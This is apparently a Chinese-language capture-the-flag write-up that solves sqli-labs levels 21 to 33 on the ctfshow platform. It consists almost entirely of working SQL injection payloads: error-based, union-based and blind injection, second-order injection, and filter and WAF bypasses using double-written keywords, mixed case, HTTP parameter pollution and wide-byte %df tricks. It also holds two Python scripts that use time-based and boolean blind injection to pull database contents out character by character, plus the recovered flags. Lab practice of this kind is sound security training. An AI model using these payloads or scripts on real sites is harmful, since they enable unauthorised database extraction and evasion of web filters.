SQLLABS 20-33
第二十一关
记得base64编码
admin’) or updatexml(1,concat(0x26,(select right(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select left(group_concat(table_name),30) from information_schema.tables where table_schema=‘ctfshow’),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select left(group_concat(column_name),30) from information_schema.columns where table_name=‘flag’),0x26),1)#
admin’) or updatexml(1,concat(0x26,(select right(group_concat(flag4),30) from ctfshow.flag),0x26),1)#
ctfshow{2e2f5457-7c1f-4c62-be9b-e60e06bcf98f}
第二十二关
把上面的’)改“
步骤差不多
ctfshow{58706930-1993-4c33-98d4-91326f15b2c2}
第二十三关
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(schema_name),30) from information_schema.schemata),0x26),1)and ’
然后差不多
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(table_name),30) from information_schema.tables where table_schema=‘ctfshow’),0x26),1)and ’
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(column_name),30) from information_schema.columns where table_name=‘flag’),0x26),1)and ’
?id=1’or updatexml(1,concat(0x26,(select left(group_concat(flag4),30) from ctfshow.flag),0x26),1)and ’
ctfshow{c3322c5b-e92d-4b1b-82d0-d18b4f075da6}
第二十四关
可以改管理员密码。。不太会,查不到库里面的数据
You tried to be smart, Try harder!!! 😦
别骂了别骂了。。
admin’ or if(1=2,1,sleep(5)) #让服务器炸了
二次注入加时间盲注
import requests
session=requests.session()
i=0
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
# payload = f'if(ascii(substr((select group_concat(table_name)from(information_schema.tables)where(table_schema="ctfshow")),{i},1))>{mid},sleep(1),0)'
# payload = f'if(ascii(substr((select group_concat(column_name)from(information_schema.columns)where(table_schema="ctfshow")),{i},1))>{mid},sleep(0.7),0)'
payload = 'if(ascii(substr((select group_concat(flag4)from(ctfshow.flag)),{},1))>{},sleep(1),0)'.format(i,mid)
username = "admin' and {} or '2'='2".format(payload)
url1 = 'http://58962273-3e5b-4881-8bef-750836065431.challenge.ctf.show:8080/login_create.php'
data1 = {
'username': username,
'password': '1',
're_password': '1',
'submit': 'Register'
}
r1 = session.post(url1, data=data1)
url2 = 'http://58962273-3e5b-4881-8bef-750836065431.challenge.ctf.show:8080/login.php'
data2 = {
'login_user': username,
'login_password': '1',
'mysubmit': 'Login',
}
r2 = session.post(url2, data=data2)
url3 = 'http://58962273-3e5b-4881-8bef-750836065431.challenge.ctf.show:8080/pass_change.php'
data3 = {
'current_password': '1',
'password': '2',
're_password': '2',
'submit': 'Reset'
}
try:
r = session.post(url3,data=data3,timeout=0.9)
tail = mid
except:
head = mid + 1
if head !=32:
result+=chr(head)
else:
break
print(result)
第二十五关
报错注入,双写绕过也行
?id=1%27^extractvalue(1,concat(0x7e,(select(database()))))%23
?id=1’^updatexml(1,concat(0x26,(select group_concat(schema_name) from infoorrmation_schema.schemata),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select left(group_concat(table_name),30) from infoorrmation_schema.tables where table_schema=‘ctfshow’),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select left(group_concat(column_name),30) from infoorrmation_schema.columns where table_name=‘flags’),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select right(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
?id=1’^updatexml(1,concat(0x26,(select left(group_concat(flag4s),30) from ctfshow.flags),0x26),1)%23
ctfshow{80fa6629-bc4a-4564-93b9-106eee1fe209}
第二十五关a
?id=-1 union select 1,2,group_concat(schema_name)from infoorrmation_schema.schemata%23爆库名
?id=-1 union select 1,2,group_concat(table_name)from infoorrmation_schema.tables where table_schema=‘ctfshow’%23
?id=-1 union select 1,2,group_concat(column_name)from infoorrmation_schema.columns where table_name=‘flags’%23
?id=-1 union select 1,2,group_concat(flag4s) from ctfshow.flags%23
第二十六关
?id=1’^extractvalue(1,concat(0x7e,(select(database())))) and’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(schema_name))from(infoorrmation_schema.schemata)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(‘ctfshow’)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)like(‘ctfshow’)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)like(‘flags’)),0x26),1)anandd’
?id=1’^updatexml(1,concat(0x26,(select(right(group_concat(flag4s),30))from(ctfshow.flags)),0x26),1)anandd’
ctfshow{bbad336b-ea6c-4094-8888-c27b7a6ec0d0}
b-ea6c-4094-8888
第二十六关a
盲注
import requests
import time
url = "http://923efabc-d503-4bbd-a28d-8f1631620fe1.challenge.ctf.show:8080/"
result=""
for i in range(1,1290):
head=32
tail=127
while head<tail:
mid=(head+tail)>>1
# payload="?id=100')||if(ascii(substr((select(group_concat(schema_name))from(infoorrmation_schema.schemata)),{},1))>{},1,0)||('0".format(i,mid)
# payload="?id=100')||if(ascii(substr((select(group_concat(table_name))from(infoorrmation_schema.tables)where(table_schema)='ctfshow'),{},1))>{},1,0)||('0".format(i,mid)
#payload="?id=100')||if(ascii(substr((select(group_concat(column_name))from(infoorrmation_schema.columns)where(table_name)='flags'),{},1))>{},1,0)||('0".format(i,mid)
payload="?id=100')||if(ascii(substr((select(flag4s)from(ctfshow.flags)),{},1))>{},1,0)||('0".format(i,mid)
# print(url+payload)
r=requests.get(url+payload)
if "Your Password:Dumb" in r.text:
head=mid+1
else:
tail=mid
if head !=32:
result+=chr(head)
else:
break
print(result)
第二十七关
大写绕过,也可以用上面的脚本,大写绕过
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(schema_name))from(information_schema.schemata)),0x26),1)||‘0
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(table_name))from(information_schema.tables)),0x26),1)||‘0
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(column_name))from(information_schema.columns)),0x26),1)||‘0
?id=1’^updatexml(1,concat(0x26,(sElect(group_concat(flag4s))from(ctfshow.flags)),0x26),1)||‘0
ctfshow{33995233-b6a5-4717-b457-76add1addd7c}
?id=1’^updatexml(1,concat(0x26,(sElect(right(group_concat(flag4s),30))from(ctfshow.flags)),0x26),1)||'0
3-b6a5-4717-b457-76add1addd7c}
第二十七关a
把教本的’)换成"
ctfshow{673c8abe-5548-48b4-b1b7-0338d3f4d45e}
第二十八关
用脚本闭合 ')
第二十八关a
不能报错注入用脚本
第二十九关
http参数污染
waf解析前者,服务器解析后者
?id=1&id=-2’union select 1,2,group_concat(flag4s) from ctfshow.flags %23
ctfshow{97c5088d-09f4-413c-a515-de989a1c32fe}
第三十关
?id=1&id=-2“union select 1,2,group_concat(flag4s) from ctfshow.flags %23
第三十一关
?id=1&id=-2")union select 1,2,group_concat(flag4s) from ctfshow.flags %23
第三十二关
宽字节注入 %df 吃
?id=-2%df’union select 1,2,group_concat(flag4s) from ctfshow.flags %23
第三十三关
一样